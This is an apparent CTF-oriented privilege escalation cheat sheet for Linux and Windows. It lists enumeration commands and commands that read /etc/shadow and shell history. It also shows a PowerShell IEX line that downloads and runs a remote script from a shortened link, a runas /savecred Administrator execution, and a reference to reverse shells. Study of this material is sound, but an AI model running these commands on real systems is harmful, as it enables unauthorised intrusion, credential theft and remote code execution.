Privilege Escalation Reference

What’s in this document?

  • Linux Privesc
  • Windows Privesc
  • Escalation scripts

Situational Awareness

When pop a shell in either a Linux box, a Windows box, or some other obscure OS, you need to get your bearings very quickly and figure out what sort of access you have, what sort of system it is, and how you can move around.

Hopefully from your recon, you should already know what operating system you’re working on, but occasionally you might just know “it’s unix-like of some sort”.

If you’re doing HackTheBox, be sure to evaluate all of these things 😉

Linux/Unix

What user am I?

This will tell you two things instantly, whether your shell is indeed running some sort of bash.

whoami && id

Dump all environment variables,

This might reveal if you’re inside a container or not.

env

Get Kernel Version and Information

You might get lucky and get a vulnerable linux privsec. This will also give you some insight as to your OS.

uname -a

What is the hostname?

If it looks something like: “de0921daed50” you might be inside a docker container.

hostname

Am I inside a docker container?

This is important information. This will change your attack tactics. Source

cat /proc/1/cgroup

If you’re inside a normal VM, it’ll look like this:

vagrant@ubuntu-13:~$ cat /proc/1/cgroup
11:name=systemd:/
10:hugetlb:/
9:perf_event:/
8:blkio:/
7:freezer:/
6:devices:/
5:memory:/
4:cpuacct:/
3:cpu:/
2:cpuset:/

If you’re in a container, it might look like this:

vagrant@ubuntu-13:~$ docker run busybox cat /proc/1/cgroup
11:name=systemd:/
10:hugetlb:/
9:perf_event:/
8:blkio:/
7:freezer:/
6:devices:/docker/3601745b3bd54d9780436faa5f0e4f72bb46231663bb99a6bb892764917832c2
5:memory:/
4:cpuacct:/
3:cpu:/docker/3601745b3bd54d9780436faa5f0e4f72bb46231663bb99a6bb892764917832c2
2:cpuset:/

What programs are installed?

Feel free to extend this list however you like, the accessible executables will be returned along with their path.

for item in $(echo "iptabes id ifconfig ip netstat arp tmux perl python ruby ls gcc wget"); do which $item; done

Is my $PATH reliable?

You might find that you shell hasn’t got a properly set PATH, this will massively impact what applications you have access to

echo $PATH

What directories contain binaries?

If your path is inaccurate, or you’re having trouble executing commands, this will safe your day

find . -executable | rev | cut -d "/" -f 2-200 | rev | sort | uniq

Or if you want to grep for bin folders.

find . -executable | rev | cut -d "/" -f 2-200 | rev | sort | uniq | grep bin

Writable files or directories outside of your home directory

find / -writable -type f -o -writable -type d 2>/dev/null | grep -Ev "^(/proc|/home/user|/tmp)"

Files that were edited in the last 10 minutes

Is somebody actively working on the machine?

find / -mmin -10 2>/dev/null | grep -Ev "^/proc"

What is running?

Does anything pop out here?

ps -ef
ps -ef | grep root
ps aux

Are there any files with SUID/GUID permission bits?

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null

Unix Capabilities

Unix has the ability to supply certain capabilities on different binaries, this has been a rooting method for reading files in many different ctfs and challenges.

From the / directory, run this.

 getcap -r / 2>/dev/null

https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux

Where can you write to?

This will find world writable directories.

find /\(-perm -o w -perm -o x\) -type d 2>/dev/null

Any hashes?

cat /etc/shadow
cat /etc/password

Can you use sudo?

It might be simpler than you think!

sudo -l
sudo -s
cat /etc/sudoers

Has a user tripped up and left their password?

cat .bash_history | grep sudo
cat .bash_history | less

pspy

Download pspy:

wget https://github.com/DominicBreuker/pspy/releases/download/v1.0.0/pspy32s

Once downloaded, chmod +x pspy32s and run it with ./pspy32s. This will take over the entire terminal or shell, so be sure to start another shell if you’re intending on doing some more poking around! Too many times have I started pspy just to ctrl+c when I had what I was looking for and to lose my shell. Infuriating, for reference you can launch a Perl reverse shell [like so](https://navisec.io/reverse-shell-reference/#perl).

pspy will monitor running processes, typically this will pick up things like cronjob scripts, and the like. I reccomend preforming actions such as clicking around webapps on the box or ssh’ing in


Windows

Unquoted Services

This occurs when a script doesn’t specifically specify the service path.

C:\> wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

Find write-access

C:\> icacls "C:\Program Files\Some Folder\"

Services

C:\> sc stop [service name]
C:\> sc start [service name]

Unattended Installs

There is a process called ‘Unattended installs’ where system administrators can automate the installation of Windows. They usually leave a `unattended.xml` file behind. It will often contain configuration settings as well as the Administrator credientials! Other files might include sysprep.xml

Stored Credientials

So something that is used occasionally in CTF’s is stored credentials using runas. For example.

Downloading files

Not so much a privesc tip, but certainly useful.

powershell.exe -command "(New-Object System.Net.WebClient).DownloadFile(\"http://127.0.0.1:8080/file.exe\", \"C:\Users/user\file.exe\")"

The following will show stored credientials:

cmdkey /list

And this will execute your executable:

runas /profile /savecred /user:ACCESS\Administrator "C:\Users\security\archive.exe"

PowerUp

A great tool for Windows Privilege escalation is PowerUp.

From Powershell:

IEX (New-Object Net.WebClient).DownloadString("http://bit.ly/1PdjSHk")

After a download:

Import-Module "$(Get-Location)\PowerUp.ps1"

Running:

Invoke-AllChecks

You can find a good cheat sheet for PowerUp [here](https://blog.certcube.com/powerup-cheatsheet/)

Urgent Contact